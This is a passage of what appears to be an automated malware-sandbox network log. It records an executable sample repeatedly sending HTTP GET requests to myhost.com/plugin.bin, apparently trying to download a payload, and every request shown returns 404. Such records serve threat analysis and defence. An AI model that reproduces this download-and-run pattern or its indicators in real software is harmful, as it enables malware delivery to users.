      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:33 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtHGEaZH256O297aH9V2jw2h5QviX2%2F7Tug1iHJWLeENwl01WqaktTsBT%2BOBlrZ9rp6C3L21%2BQtNYULvZ1riOacatyyC0Wk3MqLZ9tE84KPmPtAvgi%2BTkVznRXKw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c0958b676c9-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:34 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SMqs0UxMACghfPD913thBZDMM0GaOSN%2BRjxImLy7yZycU%2F4HE2XHbzk6fUNg6jhbA3epwMRc1bSNutN%2Bt103sq5vDKt%2Fe4ueXPHcEbyTJSLL8b9La2EYzq0CipWG"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c106b8963ea-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:35 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4iu3W03h6hVCojILdxzSgA9bdAuJs9pKS%2Bb3brx6XyEv3hsXYwHIrF4Jut0xlOD2M67QrXnTisCrSOpMp%2BnhYmuxKL1Yw%2BGurEZ5AQt4yuSC2%2BVdQ3Ty%2FTo6Ol0C"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c1799983690-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:46 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CHRXtpCCNytiBG3qDcmDQLOKQiJ14qAzEwTb%2B1OsH%2FVYbok%2FAKRHf0RsLnaMl%2FQ%2Bx0Mjw98NX2QyPOfzCmyzMOCIa88zknwf%2F%2Fq3zTP74C39rEo2Mg3HwNVijg9b"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c5b8e46954b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:47 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYgr8z94ZYSMhVl57PI7PmRWBw7Mad%2F5a7T3vT%2FdDYjsemp4JtzEe1M%2BBSvqdnB8UwbnLiX7xCoUQQXzdJ%2FO5ihIkFpIxHCyUBBnJhB%2BKQB837hESs3Mi3dO%2FTQI"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c62a8a19436-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:48 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8MBNBXjJqLaSbBfzuO4fAXpvd5M2wFDM7RTwQxnkv1AK%2FJqkA9%2BBvMqJ1Kz60U%2Bm5qQXEG92Zf139cUAnPhqyqIfj7k6gnqxnsK%2F6jqpaHOazE%2BcvtsNrcQE7EN"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c683c1676ef-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:49 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VcIE%2F%2FLLYiU9sQrgZWlG%2FLeCDe7PnlOb4Dr9mJCS1Y9LzDIAall1IJtK9dXzztLUKkTDtgZy4pKWqu0pDYcQjmt1h7FKpBUDWpjrCLAcWtfTnQyqicnbVQ1MxxXM"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c6dcf4763db-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:51 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=taNxpjjIbKmsHdY%2FvGRkIfZOD%2BDXb6kmz4GJ3FhXqffeuTws4%2FgvQDdG9yivMpcv7F20IE525ZK84ZUc3ONsMKJaFTKM6bXY%2FnbFgji5BXbsabm9XvbXmxrbR7Cs"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c796d5f9565-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:52 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgbsXHNa6trnQqRjG67XGSik%2FlGFhjm6aclylq%2BU930GUd64NagYwP%2FawyyqmLS%2BF4X0uWfUbyBGdtwDCrMLmfUc0aaP8xpNIJggXLQKp3oRXeIBJojG5NQJE6ew"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c7ecb55731a-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bu93YFNdS6ouiTIvTXTfyjXWhsqFSzsmdxp27xTfEMCz9MeerQXc7DR3q12i03KzQ505Vm3AOrjuIkCbkyIJhxg2ya5y72kd8hAfHm89ipMf5YxeNxKG7GJYjhdU"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c85bbb34152-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:53 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S6DntYUtSy83A%2BJnYjbr%2FXS%2FWakvHrds8o8Zbt9dUM9V9MbHerkLObq8v%2Fm539vqDfbmMcsoCuRVwZPbrb2HSRZcZxchd%2BQadXsnJCs0y5QXurGp%2FXdVJbURmtOg"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c8b6e2d8892-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:54 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T4wXQ9sc%2FK7Iw5ams1B98YS%2FMUrF5it6QJINOktFCHYBWcxn9i6WRi%2Fvu0AJlCC5V3y878QLTZt6VqP%2FdLMVh87qPuThfP729L9vpO80hXqD4BDQSdomJc31QOMt"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c911a4088b9-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:56 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aW1JpoBGkJWD4mK0qxF3HR2UqtEXELYwFkHI%2BIBaCh9Tl0svxsOOO8DBEXZ4tVRB2EzvH3Xa4w1PTCdzloIk96gjFLd7y1KxPMytJMvKL%2ByFeSSmI0XI%2Fwc5990A"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c96bb9063d9-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:57 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TUXhlTCqWnCKEOppXPqLRQEzQF0BFH8JK%2FPOvP0DFx5XUutKj%2BBY8ui10z7n48CdJI%2FKGivNTd45upxvG%2F4FnBfjrpsEiYWbH4RkqCZs%2FAM6LhZYFIgkJBAvnd5K"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735c9e19479563-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXM76quDExHv%2FIllHJS5QLbFcaxli4uzv6lHyYakFSuLZw8caDb5%2FoqWQsYS%2FFggn8AuNxq61Y5xPdGzOPgj4stgrW5%2Fnk%2BHVL6VbscgmPWiDYGcncAIyER09E5v"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735ca53fe26377-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:57:59 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XvxDzSaU%2FRaWj36QxO5YHzMRkD54lG3BTJsUTCuNWWdtaPpNRo8syYjt6QidoJl9nvkKcuTCGcd1p74SBrQEOxrYwuypGS2%2FqHUj%2FP%2FUZEnfe5KmDqtojr8LUlFU"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735caabf5a240b-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:00 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKES9WKXWyO5KfQU6XfFd3r9uYHNSSM2iwDaNrXzpeI7LgQ9TMy%2FOApL5CwE55%2BXgnFlU7F2NXw4cNyQmVzEtQZU4Kd0qGvIsn8MJlmKHuEPTalQvP6OxLBDYD8U"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735cb1c9d69490-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iqZUAUJlsB5JvZ29RyuAR8%2F6MqWDZjDn5kW9qkiEcrleuHQMRlrTEgi8Kw3IToThL7%2FrY3cV7r974K%2B6EM3pFTsB8TSoj%2BlUxWVZes%2FneXwcoNAw1tUKGvwDO2pe"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735cb74fc27192-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding,Cookie
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: max-age=14400, must-revalidate
      Link: <https://myhost.com/wp-json/>; rel="https://api.w.org/"
      CF-Cache-Status: EXPIRED
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b518vNA1z%2Fe%2F5haQQB2puHGrdYOmG8B4GigmXHYGt86B0oXGZ07f3AAXV6SQPVqHP1oqUFl0rM2SyxkgauHvLd4Z2KTTNRUs%2FunLDulXHhtlnNXOSFnYk3bk1NJ%2F"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 88735cfcae0d88b0-LHR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
    • flag-us
      GET
      https://myhost.com/plugin.bin
      62b12477a3468dc789f91d8fd9e2ba8e_JaffaCakes118.exe
      Remote address:
      172.67.177.125:443
      Request
      GET /plugin.bin HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: myhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 21 May 2024 08:58:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
